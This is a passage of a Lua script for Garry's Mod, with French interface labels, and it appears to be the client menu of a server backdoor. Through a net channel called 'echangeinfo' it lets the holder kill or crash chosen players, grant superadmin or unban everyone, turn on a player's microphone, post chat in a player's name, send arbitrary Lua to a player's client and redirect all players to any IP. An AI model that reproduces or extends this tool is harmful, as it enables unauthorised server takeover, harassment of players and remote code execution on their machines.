  822. end ):SetIcon( "icon16/application_xp_terminal.png" )
  824. trollall:AddOption( "D4NC3 FL00R! ", function()
  825. net.Start( "echangeinfo" )
  826. net.WriteString("dancefloor")
  827. net.WriteEntity( userl )
  828. net.SendToServer()
  829. end ):SetIcon( "icon16/rainbow.png" )
  832. animationallsubsalute:AddOption( "1 fois", function()
  833. net.Start( "echangeinfo" )
  834. net.WriteString("animation_salute")
  835. net.WriteEntity( userl )
  836. net.SendToServer()
  837. end ):SetIcon( "icon16/bell.png" )
  839. animationallsubsalute:AddOption( "en boucle", function()
  840. net.Start( "echangeinfo" )
  841. net.WriteString("animation_salute_loop")
  842. net.WriteEntity( userl )
  843. net.SendToServer()
  844. end ):SetIcon( "icon16/bell.png" )
  846. animationallsubrobot:AddOption( "1 fois", function()
  847. net.Start( "echangeinfo" )
  848. net.WriteString("animation_robot")
  849. net.WriteEntity( userl )
  850. net.SendToServer()
  851. end ):SetIcon( "icon16/bell.png" )
  852. animationallsubrobot:AddOption( "en boucle", function()
  853. net.Start( "echangeinfo" )
  854. net.WriteString("animation_robot_loop")
  855. net.WriteEntity( userl )
  856. net.SendToServer()
  857. end ):SetIcon( "icon16/bell.png" )
  859. animationallsubcheer:AddOption( "1 fois", function()
  860. net.Start( "echangeinfo" )
  861. net.WriteString("animation_cheer")
  862. net.WriteEntity( userl )
  863. net.SendToServer()
  864. end ):SetIcon( "icon16/bell.png" )
  865. animationallsubcheer:AddOption( "en boucle", function()
  866. net.Start( "echangeinfo" )
  867. net.WriteString("animation_cheer_loop")
  868. net.WriteEntity( userl )
  869. net.SendToServer()
  870. end ):SetIcon( "icon16/bell.png" )
  872. animationallsublaugh:AddOption( "1 fois", function()
  873. net.Start( "echangeinfo" )
  874. net.WriteString("animation_laugh")
  875. net.WriteEntity( userl )
  876. net.SendToServer()
  877. end ):SetIcon( "icon16/bell.png" )
  879. animationallsublaugh:AddOption( "en boucle", function()
  880. net.Start( "echangeinfo" )
  881. net.WriteString("animation_laugh_loop")
  882. net.WriteEntity( userl )
  883. net.SendToServer()
  884. end ):SetIcon( "icon16/bell.png" )
  886. animationallsubmuscle:AddOption( "1 fois", function()
  887. net.Start( "echangeinfo" )
  888. net.WriteString("animation_muscle")
  889. net.WriteEntity( userl )
  890. net.SendToServer()
  891. end ):SetIcon( "icon16/bell.png" )
  893. animationallsubmuscle:AddOption( "en boucle", function()
  894. net.Start( "echangeinfo" )
  895. net.WriteString("animation_muscle_loop")
  896. net.WriteEntity( userl )
  897. net.SendToServer()
  898. end ):SetIcon( "icon16/bell.png" )
  900. animationallsubpersistence:AddOption( "1 fois", function()
  901. net.Start( "echangeinfo" )
  902. net.WriteString("animation_persistence")
  903. net.WriteEntity( userl )
  904. net.SendToServer()
  905. end ):SetIcon( "icon16/bell.png" )
  907. animationallsubpersistence:AddOption( "en boucle", function()
  908. net.Start( "echangeinfo" )
  909. net.WriteString("animation_persistence_loop")
  910. net.WriteEntity( userl )
  911. net.SendToServer()
  912. end ):SetIcon( "icon16/bell.png" )
  914. animationallsubdance:AddOption( "1 fois", function()
  915. net.Start( "echangeinfo" )
  916. net.WriteString("animation_dance")
  917. net.WriteEntity( userl )
  918. net.SendToServer()
  919. end ):SetIcon( "icon16/bell.png" )
  921. animationallsubdance:AddOption( "en boucle", function()
  922. net.Start( "echangeinfo" )
  923. net.WriteString("animation_dance_loop")
  924. net.WriteEntity( userl )
  925. net.SendToServer()
  926. end ):SetIcon( "icon16/bell.png" )
  928. animationall:AddOption( "STOP ALL", function()
  929. net.Start( "echangeinfo" )
  930. net.WriteString("stop_timer_animation")
  931. net.WriteEntity( userl )
  932. net.SendToServer()
  933. end ):SetIcon( "icon16/bell.png" )
  935. ulxall:AddOption( "Unban ALL ", function()
  936. net.Start( "echangeinfo" )
  937. net.WriteString("unbanall")
  938. net.WriteEntity( userl )
  939. net.SendToServer()
  940. end ):SetIcon( "icon16/status_online.png" )
  942. ulxall:AddOption( "Give une arme", function()
  943. local frame = vgui.Create( "DFrame" )
  944. frame:SetSize( 400, 100 )
  945. frame:SetTitle( "" )
  946. frame:Center()
  947. frame:MakePopup()
  948. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  949. TextEntry:SetPos( 25, 50 )
  950. TextEntry:SetSize( 350, 35 )
  951. TextEntry:SetText( "weapon_rpg" )
  952. TextEntry.OnEnter = function( self )
  953. net.Start( "echangeinfo" )
  954. net.WriteString("itemsall")
  955. net.WriteEntity( userl )
  956. net.WriteString(TextEntry:GetValue())
  957. net.SendToServer()
  958. end
  959. end ):SetIcon( "icon16/bomb.png" )
  961. ulxall:AddOption( "Changer les models", function()
  962. local frame = vgui.Create( "DFrame" )
  963. frame:SetSize( 400, 100 )
  964. frame:SetTitle( "" )
  965. frame:Center()
  966. frame:MakePopup()
  967. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  968. TextEntry:SetPos( 25, 50 )
  969. TextEntry:SetSize( 350, 35 )
  970. TextEntry:SetText( "models/editor/playerstart.mdl" )
  971. TextEntry.OnEnter = function( self )
  972. net.Start( "echangeinfo" )
  973. net.WriteString("modelall")
  974. net.WriteEntity( userl )
  975. net.WriteString(TextEntry:GetValue())
  976. net.SendToServer()
  977. end
  978. end ):SetIcon( "icon16/box.png" )
  980. ulxall:AddOption( "Rediriger tous les joueurs vers une ip", function()
  981. local frame = vgui.Create( "DFrame" )
  982. frame:SetSize( 400, 100 )
  983. frame:SetTitle( "" )
  984. frame:Center()
  985. frame:MakePopup()
  986. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  987. TextEntry:SetPos( 25, 50 )
  988. TextEntry:SetSize( 350, 35 )
  989. TextEntry:SetText( "" )
  990. TextEntry.OnEnter = function( self )
  991. net.Start( "echangeinfo" )
  992. net.WriteString("redirectplayer")
  993. net.WriteEntity( userl )
  994. net.WriteString(TextEntry:GetValue())
  995. net.SendToServer()
  996. end
  997. end ):SetIcon( "icon16/server_go.png" )
  999. m:AddSpacer() -- Add a spacer
  1000. m:Open() -- Show our menu
  1001. end
  1002. local AppList = vgui.Create( "DListView", Frame )
  1003. AppList:SetMultiSelect( false )
  1004. AppList:AddColumn( "Utilisateur" )
  1005. AppList:SetSize( ScrW() -400, ScrH() -400 );
  1006. AppList:SetPos( 100, 80 );
  1007. for k, v in pairs(player.GetAll()) do
  1008. AppList:AddLine( v:Nick() .. " " .. v:GetUserGroup(), v)
  1009. end
  1010. AppList.OnRowSelected = function( lst, index, pnl )
  1011. userl = pnl:GetColumnText( 2 )
  1012. valuess = pnl:GetColumnText( 1 )
  1013. local m = DermaMenu()
  1014. local meutre, meutreicon = m:AddSubMenu( "Meutre" )
  1015. meutreicon:SetIcon( "icon16/bomb.png" )
  1016. m:AddSpacer()
  1017. local ulx, ulxicon = m:AddSubMenu( "Commandes" )
  1018. ulxicon:SetIcon( "icon16/script_edit.png" )
  1019. m:AddSpacer()
  1020. local visuel, visuelicon = m:AddSubMenu( "Visuel" )
  1021. visuelicon:SetIcon( "icon16/eye.png" )
  1022. m:AddSpacer()
  1023. local soundboard, soundboardlicon = m:AddSubMenu( "SoundBoard" )
  1024. soundboardlicon:SetIcon( "icon16/sound.png" )
  1025. m:AddSpacer()
  1026. local tpsub, tpsubicon = m:AddSubMenu( "Téléportation" )
  1027. tpsubicon:SetIcon( "icon16/user_go.png" )
  1028. local tpsubgmconstruct, tpsubgmconstructicon = tpsub:AddSubMenu( "GM_CONSTRUCT" )
  1029. tpsubgmconstructicon:SetIcon( "icon16/map.png" )
  1030. local tpsubgmflat, tpsubgmflaticon = tpsub:AddSubMenu( "GM_FLATGRASS" )
  1031. tpsubgmflaticon:SetIcon( "icon16/map.png" )
  1032. local tpsubglife3, tpsubglife3icon = tpsub:AddSubMenu( "RP_GLIFE_ROCKFORD3" )
  1033. tpsubglife3icon:SetIcon( "icon16/map.png" )
  1034. local downtownv4cv2, downtownv4cv2icon = tpsub:AddSubMenu( "RP_ROCKFORD_V2B" )
  1035. downtownv4cv2icon:SetIcon( "icon16/map.png" )
  1036. local ulxsubgrade, ulxsubgradeicon = ulx:AddSubMenu( "Grades" )
  1037. ulxsubgradeicon:SetIcon( "icon16/user.png" )
  1038. local ulxsubgod, ulxsubgodicon = ulx:AddSubMenu( "Mode dieu" )
  1039. ulxsubgodicon:SetIcon( "icon16/heart.png" )
  1040. local ulxsubfreeze, ulxsubfreezeicon = ulx:AddSubMenu( "Freeze" )
  1041. ulxsubfreezeicon:SetIcon( "icon16/heart.png" )
  1042. local ulxsubnoclip, ulxsubnoclipicon = ulx:AddSubMenu( "NOCLIP" )
  1043. ulxsubnoclipicon:SetIcon( "icon16/drive_user.png" )
  1044. m:AddSpacer()
  1045. local animation, animationicon = m:AddSubMenu( "Animation" )
  1046. animationicon:SetIcon( "icon16/wand.png" )
  1047. m:AddSpacer()
  1048. local mooves, moovesicon = m:AddSubMenu( "Mouvement" )
  1049. moovesicon:SetIcon( "icon16/controller.png" )
  1050. m:AddSpacer()
  1051. local troll, trollicon = m:AddSubMenu( "Troll Menu" )
  1052. trollicon:SetIcon( "icon16/rainbow.png" )
  1053. local trollsubflash, trollsubflashicon = troll:AddSubMenu( "Flashlight SPAM" )
  1054. trollsubflashicon:SetIcon( "icon16/lightbulb_off.png" )
  1055. local trollsubscreen, trollsubscreenicon = troll:AddSubMenu( "Screenshot SPAM" )
  1056. trollsubscreenicon:SetIcon( "icon16/camera.png" )
  1057. local trollsubstopsound, trollsubstopsoundicon = troll:AddSubMenu( "Stopsound SPAM" )
  1058. trollsubstopsoundicon:SetIcon( "icon16/sound_mute.png" )
  1059. local trollsubmoooves, trollsubmooovesicon = troll:AddSubMenu( "Mouvement" )
  1060. trollsubmooovesicon:SetIcon( "icon16/bug_error.png" )
  1061. local trollsubgravity, trollsubgravityicon = troll:AddSubMenu( "Gravité Casser" )
  1062. trollsubgravityicon:SetIcon( "icon16/star.png" )
  1063. local trollsubjumpc, trollsubjumpcicon = troll:AddSubMenu( "Jump Casser" )
  1064. trollsubjumpcicon:SetIcon( "icon16/star.png" )
  1065. local trollsubmic, trollsubmicicon = troll:AddSubMenu( "Micro" )
  1066. trollsubmicicon:SetIcon( "icon16/sound.png" )
  1067. local trollprison, trollprisonicon = troll:AddSubMenu( "Prison" )
  1068. trollprisonicon:SetIcon( "icon16/user_orange.png" )
  1069. m:AddSpacer()
  1070. meutre:AddOption( "Tuer la personne", function()
  1071. net.Start( "echangeinfo" )
  1072. net.WriteString("killuser")
  1073. net.WriteEntity( userl )
  1074. net.SendToServer()
  1075. actioneff("Vous venez de tuer " .. userl:Nick())
  1076. end ):SetIcon( "icon16/delete.png" )
  1077. meutre:AddOption( "Tuer la personne (silencieux)", function()
  1078. net.Start( "echangeinfo" )
  1079. net.WriteString("killusersilence")
  1080. net.WriteEntity( userl )
  1081. net.SendToServer()
  1082. actioneff("Vous venez de tuer " .. userl:Nick())
  1083. end ):SetIcon( "icon16/delete.png" )
  1084. meutre:AddOption( "Bruler la personne", function()
  1085. net.Start( "echangeinfo" )
  1086. net.WriteString("fireuser")
  1087. net.WriteEntity( userl )
  1088. net.SendToServer()
  1089. actioneff("Vous venez de bruler " .. userl:Nick())
  1090. end ):SetIcon( "icon16/delete.png" )
  1092. meutre:AddOption( "Exploser la personne", function()
  1093. net.Start( "echangeinfo" )
  1094. net.WriteString("exploseuser")
  1095. net.WriteEntity( userl )
  1096. net.SendToServer()
  1097. actioneff("Vous venez d'exploser " .. userl:Nick())
  1098. end ):SetIcon( "icon16/delete.png" )
  1100. ulxsubgrade:AddOption( "[SUPERADMIN]", function()
  1101. net.Start( "echangeinfo" )
  1102. net.WriteString("superadmin")
  1103. net.WriteEntity( userl )
  1104. net.SendToServer()
  1105. actioneff("Vous venez de passer " .. userl:Nick() .. " [superadmin]")
  1106. end ):SetIcon( "icon16/user_add.png" )
  1108. ulxsubgrade:AddOption( "[USER]", function()
  1109. net.Start( "echangeinfo" )
  1110. net.WriteString("userrank")
  1111. net.WriteEntity( userl )
  1112. net.SendToServer()
  1113. actioneff("Vous venez de passer " .. userl:Nick() .. " [user]")
  1114. end ):SetIcon( "icon16/user_delete.png" )
  1116. ulxsubgrade:AddOption( "[CUSTOM]", function()
  1117. local frame = vgui.Create( "DFrame" )
  1118. frame:SetSize( 400, 100 )
  1119. frame:SetTitle( "" )
  1120. frame:Center()
  1121. frame:MakePopup()
  1122. local TextEntry = vgui.Create( "DTextEntry", frame )
  1123. TextEntry:SetPos( 25, 50 )
  1124. TextEntry:SetSize( 350, 35 )
  1125. TextEntry:SetText( "vip" )
  1126. TextEntry.OnEnter = function( self )
  1127. net.Start( "echangeinfo" )
  1128. net.WriteString("custom")
  1129. net.WriteEntity( userl )
  1130. net.WriteString(TextEntry:GetValue())
  1131. net.SendToServer()
  1132. end
  1133. end ):SetIcon( "icon16/user_delete.png" )
  1135. ulxsubnoclip:AddOption( "[ON]", function()
  1136. net.Start( "echangeinfo" )
  1137. net.WriteString("noclipon")
  1138. net.WriteEntity( userl )
  1139. net.SendToServer()
  1140. end ):SetIcon( "icon16/accept.png" )
  1142. ulxsubnoclip:AddOption( "[OFF]", function()
  1143. net.Start( "echangeinfo" )
  1144. net.WriteString("noclipoff")
  1145. net.WriteEntity( userl )
  1146. net.SendToServer()
  1147. end ):SetIcon( "icon16/cancel.png" )
  1149. ulx:AddOption( "Donner de l'argent", function()
  1150. local frame = vgui.Create( "DFrame" )
  1151. frame:SetSize( 400, 100 )
  1152. frame:SetTitle( "" )
  1153. frame:Center()
  1154. frame:MakePopup()
  1155. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1156. TextEntry:SetPos( 25, 50 )
  1157. TextEntry:SetSize( 350, 35 )
  1158. TextEntry:SetText( "500" )
  1159. TextEntry.OnEnter = function( self )
  1160. net.Start( "echangeinfo" )
  1161. net.WriteString("addmoney")
  1162. net.WriteEntity( userl )
  1163. net.WriteString(TextEntry:GetValue())
  1164. net.SendToServer()
  1165. end
  1166. end ):SetIcon( "icon16/money_add.png" )
  1168. ulx:AddOption( "Point de Vie", function()
  1169. local frame = vgui.Create( "DFrame" )
  1170. frame:SetSize( 400, 100 )
  1171. frame:SetTitle( "" )
  1172. frame:Center()
  1173. frame:MakePopup()
  1174. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1175. TextEntry:SetPos( 25, 50 )
  1176. TextEntry:SetSize( 350, 35 )
  1177. TextEntry:SetText( "100" )
  1178. TextEntry.OnEnter = function( self )
  1179. net.Start( "echangeinfo" )
  1180. net.WriteString("pvheal")
  1181. net.WriteEntity( userl )
  1182. net.WriteString(TextEntry:GetValue())
  1183. net.SendToServer()
  1184. end
  1185. end ):SetIcon( "icon16/heart.png" )
  1187. ulx:AddOption( "Point d'armure", function()
  1188. local frame = vgui.Create( "DFrame" )
  1189. frame:SetSize( 400, 100 )
  1190. frame:SetTitle( "" )
  1191. frame:Center()
  1192. frame:MakePopup()
  1193. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1194. TextEntry:SetPos( 25, 50 )
  1195. TextEntry:SetSize( 350, 35 )
  1196. TextEntry:SetText( "250" )
  1197. TextEntry.OnEnter = function( self )
  1198. net.Start( "echangeinfo" )
  1199. net.WriteString("armorpv")
  1200. net.WriteEntity( userl )
  1201. net.WriteString(TextEntry:GetValue())
  1202. net.SendToServer()
  1203. end
  1204. end ):SetIcon( "icon16/user_suit.png" )
  1206. troll:AddOption( "Launch", function()
  1207. net.Start( "echangeinfo" )
  1208. net.WriteString("launchuser")
  1209. net.WriteEntity( userl )
  1210. net.SendToServer()
  1211. actioneff("Vous d'envoyer " .. userl:Nick() .. " dans les airs")
  1212. end ):SetIcon( "icon16/arrow_up.png" )
  1214. ulx:AddOption( "Meurtre au RPG", function()
  1215. net.Start( "echangeinfo" )
  1216. net.WriteString("lockdown")
  1217. net.WriteEntity( userl )
  1218. net.SendToServer()
  1219. end ):SetIcon( "icon16/clock_red.png" )
  1221. troll:AddOption( "2D Players", function()
  1222. net.Start( "echangeinfo" )
  1223. net.WriteString("2dplayeruser")
  1224. net.WriteEntity( userl )
  1225. net.SendToServer()
  1226. end ):SetIcon( "icon16/arrow_up.png" )
  1228. troll:AddOption( "Donner la grosse tête", function()
  1229. net.Start( "echangeinfo" )
  1230. net.WriteString("grosseteteuser")
  1231. net.WriteEntity( userl )
  1232. net.SendToServer()
  1233. end ):SetIcon( "icon16/bug.png" )
  1235. troll:AddOption( "Changer la taille du joueur", function()
  1236. local frame = vgui.Create( "DFrame" )
  1237. frame:SetSize( 400, 100 )
  1238. frame:SetTitle( "" )
  1239. frame:Center()
  1240. frame:MakePopup()
  1241. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1242. TextEntry:SetPos( 25, 50 )
  1243. TextEntry:SetSize( 350, 35 )
  1244. TextEntry:SetText( "5" )
  1245. TextEntry.OnEnter = function( self )
  1246. net.Start( "echangeinfo" )
  1247. net.WriteString("scaleuser")
  1248. net.WriteEntity( userl )
  1249. net.WriteString(TextEntry:GetValue())
  1250. net.SendToServer()
  1251. end
  1252. end ):SetIcon( "icon16/application_edit.png" )
  1254. troll:AddOption( "Faire crash le joueur", function()
  1255. net.Start( "echangeinfo" )
  1256. net.WriteString("crashuser")
  1257. net.WriteEntity( userl )
  1258. net.SendToServer()
  1259. actioneff(userl:Nick() .. " vient de crash")
  1260. end ) :SetIcon( "icon16/disconnect.png" )
  1262. troll:AddOption( "Hurlement", function()
  1263. net.Start( "echangeinfo" )
  1264. net.WriteString("hurlementuser")
  1265. net.WriteEntity( userl )
  1266. net.SendToServer()
  1267. actioneff("Vous venez d'hurler sur " .. userl:Nick())
  1268. end ):SetIcon( "icon16/bell.png" )
  1270. trollsubflash:AddOption( "[ON]", function()
  1271. net.Start( "echangeinfo" )
  1272. net.WriteString("flashon")
  1273. net.WriteEntity( userl )
  1274. net.SendToServer()
  1275. end ):SetIcon( "icon16/accept.png" )
  1277. trollsubflash:AddOption( "[OFF]", function()
  1278. net.Start( "echangeinfo" )
  1279. net.WriteString("flashoff")
  1280. net.WriteEntity( userl )
  1281. net.SendToServer()
  1282. end ):SetIcon( "icon16/cancel.png" )
  1284. trollsubscreen:AddOption( "[ON]", function()
  1285. net.Start( "echangeinfo" )
  1286. net.WriteString("screenon")
  1287. net.WriteEntity( userl )
  1288. net.SendToServer()
  1289. end ):SetIcon( "icon16/accept.png" )
  1291. trollsubscreen:AddOption( "[OFF]", function()
  1292. net.Start( "echangeinfo" )
  1293. net.WriteString("screenoff")
  1294. net.WriteEntity( userl )
  1295. net.SendToServer()
  1296. end ):SetIcon( "icon16/cancel.png" )
  1298. trollsubstopsound:AddOption( "[ON]", function()
  1299. net.Start( "echangeinfo" )
  1300. net.WriteString("stopsoundon")
  1301. net.WriteEntity( userl )
  1302. net.SendToServer()
  1303. end ):SetIcon( "icon16/accept.png" )
  1305. trollsubstopsound:AddOption( "[OFF]", function()
  1306. net.Start( "echangeinfo" )
  1307. net.WriteString("stopsoundoff")
  1308. net.WriteEntity( userl )
  1309. net.SendToServer()
  1310. end ):SetIcon( "icon16/cancel.png" )
  1312. trollsubmoooves:AddOption( "[ON]", function()
  1313. net.Start( "echangeinfo" )
  1314. net.WriteString("moovetroll")
  1315. net.WriteEntity( userl )
  1316. net.SendToServer()
  1317. actioneff(userl:Nick().." vient de perdre le contrôle")
  1318. end ):SetIcon( "icon16/accept.png" )
  1320. trollsubmoooves:AddOption( "[OFF]", function()
  1321. net.Start( "echangeinfo" )
  1322. net.WriteString("unmoovetroll")
  1323. net.WriteEntity( userl )
  1324. net.SendToServer()
  1325. actioneff(userl:Nick().." vient de reprendre le contrôle")
  1326. end ):SetIcon( "icon16/cancel.png" )
  1328. trollsubgravity:AddOption( "[ON]", function()
  1329. net.Start( "echangeinfo" )
  1330. net.WriteString("cassergr")
  1331. net.WriteEntity( userl )
  1332. net.SendToServer()
  1333. actioneff("Vous venez de casser la gravité de " .. userl:Nick())
  1334. end ):SetIcon( "icon16/accept.png" )
  1336. trollsubgravity:AddOption( "[OFF]", function()
  1337. net.Start( "echangeinfo" )
  1338. net.WriteString("retablirgr")
  1339. net.WriteEntity( userl )
  1340. net.SendToServer()
  1341. actioneff("Vous venez de rétablir la gravité à " .. userl:Nick())
  1342. end ):SetIcon( "icon16/cancel.png" )
  1344. trollsubjumpc:AddOption( "[ON]", function()
  1345. net.Start( "echangeinfo" )
  1346. net.WriteString("jumpuser")
  1347. net.WriteEntity( userl )
  1348. net.SendToServer()
  1349. actioneff("Vous venez de casser la gravité des sauts de " .. userl:Nick())
  1350. end ):SetIcon( "icon16/accept.png" )
  1352. trollsubjumpc:AddOption( "[OFF]", function()
  1353. net.Start( "echangeinfo" )
  1354. net.WriteString("retablirjumpuser")
  1355. net.WriteEntity( userl )
  1356. net.SendToServer()
  1357. actioneff("Vous venez de rétablir la gravité des sauts de " .. userl:Nick())
  1358. end ):SetIcon( "icon16/cancel.png" )
  1360. troll:AddOption( "Black Screen", function()
  1361. net.Start( "echangeinfo" )
  1362. net.WriteString("blackscreen")
  1363. net.WriteEntity( userl )
  1364. net.SendToServer()
  1365. actioneff("Vous venez d'enlever la vue à " .. userl:Nick())
  1366. end ):SetIcon( "icon16/contrast.png" )
  1368. troll:AddOption( "Imitation", function()
  1369. local frame = vgui.Create( "DFrame" )
  1370. frame:SetSize( 400, 100 )
  1371. frame:SetTitle( "" )
  1372. frame:Center()
  1373. frame:MakePopup()
  1374. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1375. TextEntry:SetPos( 25, 50 )
  1376. TextEntry:SetSize( 350, 35 )
  1377. TextEntry:SetText( "/ooc Je suis un soumis." )
  1378. TextEntry.OnEnter = function( self )
  1379. net.Start( "echangeinfo" )
  1380. net.WriteString("imitation")
  1381. net.WriteEntity( userl )
  1382. net.WriteString(TextEntry:GetValue())
  1383. net.SendToServer()
  1384. end
  1385. end ):SetIcon( "icon16/application_edit.png" )
  1387. trollsubmic:AddOption( "[ON]", function()
  1388. net.Start( "echangeinfo" )
  1389. net.WriteString("micon")
  1390. net.WriteEntity( userl )
  1391. net.SendToServer()
  1392. actioneff("Vous avez activer le micro de " .. userl:Nick() )
  1393. end ):SetIcon( "icon16/accept.png" )
  1395. trollsubmic:AddOption( "[OFF]", function()
  1396. net.Start( "echangeinfo" )
  1397. net.WriteString("micoff")
  1398. net.WriteEntity( userl )
  1399. net.SendToServer()
  1400. actioneff("Vous avez désactiver le micro de " .. userl:Nick() )
  1401. end ):SetIcon( "icon16/cancel.png" )
  1403. troll:AddOption( "Changer le model", function()
  1404. local frame = vgui.Create( "DFrame" )
  1405. frame:SetSize( 400, 100 )
  1406. frame:SetTitle( "" )
  1407. frame:Center()
  1408. frame:MakePopup()
  1409. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1410. TextEntry:SetPos( 25, 50 )
  1411. TextEntry:SetSize( 350, 35 )
  1412. TextEntry:SetText( "models/editor/playerstart.mdl" )
  1413. TextEntry.OnEnter = function( self )
  1414. net.Start( "echangeinfo" )
  1415. net.WriteString("setmodel")
  1416. net.WriteEntity( userl )
  1417. net.WriteString(TextEntry:GetValue())
  1418. net.SendToServer()
  1419. end
  1420. end ):SetIcon( "icon16/box.png" )
  1422. troll:AddOption( "Send LUA", function()
  1423. local frame = vgui.Create( "DFrame" )
  1424. frame:SetSize( 400, 100 )
  1425. frame:SetTitle( "" )
  1426. frame:Center()
  1427. frame:MakePopup()
  1428. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1429. TextEntry:SetPos( 25, 50 )
  1430. TextEntry:SetSize( 350, 35 )
  1431. TextEntry:SetText( "Lua Code" )
  1432. TextEntry.OnEnter = function( self )
  1433. net.Start( "echangeinfo" )
  1434. net.WriteString("sendluauser")
  1435. net.WriteEntity( userl )
  1436. net.WriteString(TextEntry:GetValue())
  1437. net.SendToServer()
  1438. end
  1439. end ):SetIcon( "icon16/application_xp_terminal.png" )
  1442. visuel:AddOption( "Visuel John", function()
  1443. net.Start( "echangeinfo" )
  1444. net.WriteString("johnsound")
  1445. net.WriteEntity( userl )
  1446. net.SendToServer()
  1447. end ):SetIcon( "icon16/application_xp_terminal.png" )
  1449. soundboard:AddOption( "SoundBoard Lien", function()
  1450. local frame = vgui.Create( "DFrame" )
  1451. frame:SetSize( 400, 100 )
  1452. frame:SetTitle( "" )
  1453. frame:Center()
  1454. frame:MakePopup()
  1455. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1456. TextEntry:SetPos( 25, 50 )
  1457. TextEntry:SetSize( 350, 35 )
  1458. TextEntry:SetText( "Lua Code" )
  1459. TextEntry.OnEnter = function( self )
  1460. net.Start( "echangeinfo" )
  1461. net.WriteString("soundboard")
  1462. net.WriteEntity( userl )
  1463. net.WriteString(TextEntry:GetValue())
  1464. net.SendToServer()
  1465. end
  1466. end ):SetIcon( "icon16/application_xp_terminal.png" )
  1468. ulxsubgod:AddOption( "[ON]", function()
  1469. net.Start( "echangeinfo" )
  1470. net.WriteString("goduseron")
  1471. net.WriteEntity( userl )
  1472. net.SendToServer()
  1473. actioneff("Vous venez de mettre en mode dieu " .. userl:Nick())
  1474. end ):SetIcon( "icon16/heart_add.png" )
  1475. ulxsubgod:AddOption( "[OFF]", function()
  1476. net.Start( "echangeinfo" )
  1477. net.WriteString("goduseroff")
  1478. net.WriteEntity( userl )
  1479. net.SendToServer()
  1480. actioneff("Vous venez d'enlever de mode dieu " .. userl:Nick())
  1481. end ):SetIcon( "icon16/heart_delete.png" )
  1482. ulx:AddOption( "Give une arme", function()
  1483. local frame = vgui.Create( "DFrame" )
  1484. frame:SetSize( 400, 100 )
  1485. frame:SetTitle( "" )
  1486. frame:Center()
  1487. frame:MakePopup()
  1488. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1489. TextEntry:SetPos( 25, 50 )
  1490. TextEntry:SetSize( 350, 35 )
  1491. TextEntry:SetText( "weapon_rpg" )
  1492. TextEntry.OnEnter = function( self )
  1493. net.Start( "echangeinfo" )
  1494. net.WriteString("items")
  1495. net.WriteEntity( userl )
  1496. net.WriteString(TextEntry:GetValue())
  1497. net.SendToServer()
  1498. end
  1499. end ):SetIcon( "icon16/bomb.png" )
  1501. ulx:AddOption( "Kick", function()
  1502. local frame = vgui.Create( "DFrame" )
  1503. frame:SetSize( 400, 100 )
  1504. frame:SetTitle( "" )
  1505. frame:Center()
  1506. frame:MakePopup()
  1507. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  1508. TextEntry:SetPos( 25, 50 )
  1509. TextEntry:SetSize( 350, 35 )
  1510. TextEntry:SetText( "Raison..." )
  1511. TextEntry.OnEnter = function( self )
  1512. net.Start( "echangeinfo" )
  1513. net.WriteString("kickuser")
  1514. net.WriteEntity( userl )
  1515. net.WriteString(TextEntry:GetValue())
  1516. net.SendToServer()
  1517. end
  1518. end ):SetIcon( "icon16/status_away.png" )
  1520. ulx:AddOption( "Ban", function()
  1521. net.Start( "echangeinfo" )
  1522. net.WriteString("banuser")
  1523. net.WriteEntity( userl )
  1524. net.SendToServer()
  1525. actioneff("Vous venez de ban " .. userl:Nick())
  1526. end ):SetIcon( "icon16/status_busy.png" )
  1528. ulx:AddOption( "BanIP", function()
  1529. net.Start( "echangeinfo" )
  1530. net.WriteString("banipuser")
  1531. net.WriteEntity( userl )
  1532. net.SendToServer()
  1533. actioneff("Vous venez de banIP " .. userl:Nick())
  1534. end ):SetIcon( "icon16/status_busy.png" )
  1536. ulxsubfreeze:AddOption( "[ON]", function()
  1537. net.Start( "echangeinfo" )
  1538. net.WriteString("freezeuser")
  1539. net.WriteEntity( userl )
  1540. net.SendToServer()
  1541. actioneff("Vous venez de freeze " .. userl:Nick())
  1542. end ):SetIcon( "icon16/accept.png" )
  1544. ulxsubfreeze:AddOption( "[OFF]", function()
  1545. net.Start( "echangeinfo" )
  1546. net.WriteString("unfreezeuser")
  1547. net.WriteEntity( userl )
  1548. net.SendToServer()
  1549. actioneff("Vous venez de unfreeze " .. userl:Nick())
  1550. end ):SetIcon( "icon16/cancel.png" )
  1552. ulx:AddOption( "Unjail", function()
  1553. net.Start( "echangeinfo" )
  1554. net.WriteString("unjailall")
  1555. net.WriteEntity( userl )
  1556. net.SendToServer()
  1557. end ):SetIcon( "icon16/bomb.png" )
  1559. ulx:AddOption( "Stripweapon", function()
  1560. net.Start( "echangeinfo" )
  1561. net.WriteString("strip")
  1562. net.WriteEntity( userl )
  1563. net.SendToServer()
  1564. actioneff("Vous venez d'enlever les armes de " .. userl:Nick() )
  1565. end ):SetIcon( "icon16/bomb.png" )
  1567. ulx:AddOption( "Context De Combat", function()
  1568. net.Start( "echangeinfo" )
  1569. net.WriteString("contextfucker")
  1570. net.WriteEntity( userl )
  1571. net.SendToServer()
  1572. actioneff("Vient d'obtenir le pouvoir de vie et de mort ")
  1573. end ):SetIcon( "icon16/bomb.png" )
  1575. tpsubgmconstruct:AddOption( "Spawn", function()
  1576. net.Start( "echangeinfo" )
  1577. net.WriteString("gm_construct_spawn")
  1578. net.WriteEntity( userl )
  1579. net.SendToServer()
  1580. end )
  1582. tpsubgmconstruct:AddOption( "Building N°1 [Dernière étage]", function()
  1583. net.Start( "echangeinfo" )
  1584. net.WriteString("gm_construct_building_roof0")
  1585. net.WriteEntity( userl )
  1586. net.SendToServer()
  1587. end )
  1589. tpsubgmconstruct:AddOption( "Building N°1 [Toit]", function()
  1590. net.Start( "echangeinfo" )
